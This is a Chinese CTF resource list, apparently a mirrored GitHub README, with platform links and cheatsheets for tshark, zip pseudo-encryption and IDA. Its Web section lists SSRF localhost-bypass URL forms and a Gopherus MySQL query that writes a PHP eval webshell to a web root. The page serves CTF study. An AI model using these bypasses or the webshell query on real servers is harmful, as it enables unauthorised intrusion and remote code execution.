Awesome-CTF

【免责声明】本仓库所涉及的技术、思路和工具仅供安全技术研究，任何人不得将其用于非授权渗透测试，不得将其用于非法用途和盈利，否则后果自行承担。

CTF平台

CTF Wiki：https://ctf-wiki.org/
CTF Time：https://ctftime.org/
攻防世界：https://adworld.xctf.org.cn/
Hacker 101：https://www.hacker101.com/
Cryptopals：密码学练习题目 https://cryptopals.com/

CTF工具

Cheatsheet

Misc

tshark流量分析

tshark -r **.pcap –Y ** -T fields –e ** | **** > data
----------------------------------------------------------------
tshark -r capture.pcapng -T fields -e usb.capdata > data2.txt

Usage:
  -Y <display filter>      packet displaY filter in Wireshark display filter
                           syntax
  -T pdml|ps|psml|json|jsonraw|ek|tabs|text|fields|?
                           format of text output (def: text)
  -e <field>               field to print if -Tfields selected (e.g. tcp.port,
                           _ws.col.Info)

通过-Y过滤器 (与 wireshark 一致), 然后用-T filds -e配合指定显示的数据段 (比如 usb.capdata)

-e后的参数不确定可以由 wireshark 右击需要的数据选中后得到

Unicode四种编码形式

源文本：The

&#x [Hex]: &#x0054;&#x0068;&#x0065;
&# [Decimal]: &#00084;&#00104;&#00101;
\U [Hex]: \U0054\U0068\U0065
\U+ [Hex]: \U+0054\U+0068\U+0065

zip伪加密

zip文件组成：

压缩源文件数据区 50 4B 03 04（0x04034b50）
压缩源文件目录区 50 4B 01 02（0x02014b50）
压缩源文件目录结束标志50 4B 05 06（0x06054b50）

压缩源文件数据区：

50 4B 03 04：这是头文件标记（0x04034b50）
14 00：解压文件所需 pkware 版本
09 00：全局方式位标记（有无加密）
08 00：压缩方式
50 A3：最后修改文件时间
A5 4A：最后修改文件日期
21 38 76 64：CRC-32校验（1480B516）
19 00 00 00：压缩后尺寸（25）
17 00 00 00：未压缩尺寸（23）
08 00：文件名长度
00 00：扩展记录长度

压缩源文件目录区：

50 4B 01 02：目录中文件文件头标记(0x02014b50)
1F 00：压缩使用的 pkware 版本
14 00：解压文件所需 pkware 版本
09 00：全局方式位标记（有无加密，这个更改这里进行伪加密，改为09 00打开就会提示有密码了）
08 00：压缩方式
50 A3：最后修改文件时间
A5 4A：最后修改文件日期
21 38 76 65：CRC-32校验（1480B516）
19 00 00 00：压缩后尺寸（25）
17 00 00 00：未压缩尺寸（23）
08 00：文件名长度
24 00：扩展字段长度
00 00：文件注释长度
00 00：磁盘开始号
00 00：内部文件属性
20 00 00 00：外部文件属性
00 00 00 00：局部头部偏移量

真假加密：

# 无加密 
压缩源文件数据区的全局加密应当为00 00
且压缩源文件目录区的全局方式位标记应当为00 00

# 假加密
压缩源文件数据区的全局加密应当为00 00
且压缩源文件目录区的全局方式位标记应当为09 00

# 真加密
压缩源文件数据区的全局加密应当为09 00
且压缩源文件目录区的全局方式位标记应当为09 00

Web

localhost绕过

http://127.0.0.1:80
http://localhost:22
http://[::]:80/  >>>  http://127.0.0.1
http://[email protected]
http://127.0.0.1.xip.io/
http://127。0。0。1  >>>  http://127.0.0.1
http://0/

# 十六进制、八进制转换
http://127.0.0.1  >>>  http://0177.0.0.1/

# 转换为小数 https://www.browserling.com/tools/ip-to-dec
http://127.0.0.1  >>>  http://2130706433/

Gopherus

# mysql
> python2 gopherus.py --exploit mysql
---------------------------------------------
Give MySQL username: root
Give query to execute: select "<?php phpinfo();?>" into outfile "/var/www/html/gopher.php"

select "<?php @eval($_POST[c]);?>" into outfile "/var/www/html/gopher.php"

Reverse

IDA快捷键

功能	快捷键
切换文本视图与图表视图	空格键
返回上一个操作地址	ESC
搜索地址和符号	G
对符号进行重命名	N
常规注释	冒号
可重复注释	分号
添加标签	Alt+M
查看标签	Ctrl+M
查看段的信息	Ctrl+S
查看交叉应用	X
查看伪代码	F5
搜索文本	Alt+T
搜索十六进制	Alt+B

Scripts

分割图片恢复原图：image_merge.py
二维码010101绘制：
- qrcode_painter_1.py
- qrcode_painter_2.py

imaizumiyui / awesome-ctf Goto Github PK

awesome-ctf's Introduction

Awesome-CTF

CTF平台

CTF工具

综合工具

Crypto

Misc

Web

Pwn

Reverse

Cheatsheet

Misc

tshark流量分析

Unicode四种编码形式

zip伪加密

Web

localhost绕过

Gopherus

Reverse

IDA快捷键

Scripts

awesome-ctf's People

Contributors

Recommend Projects

Recommend Topics

Recommend Org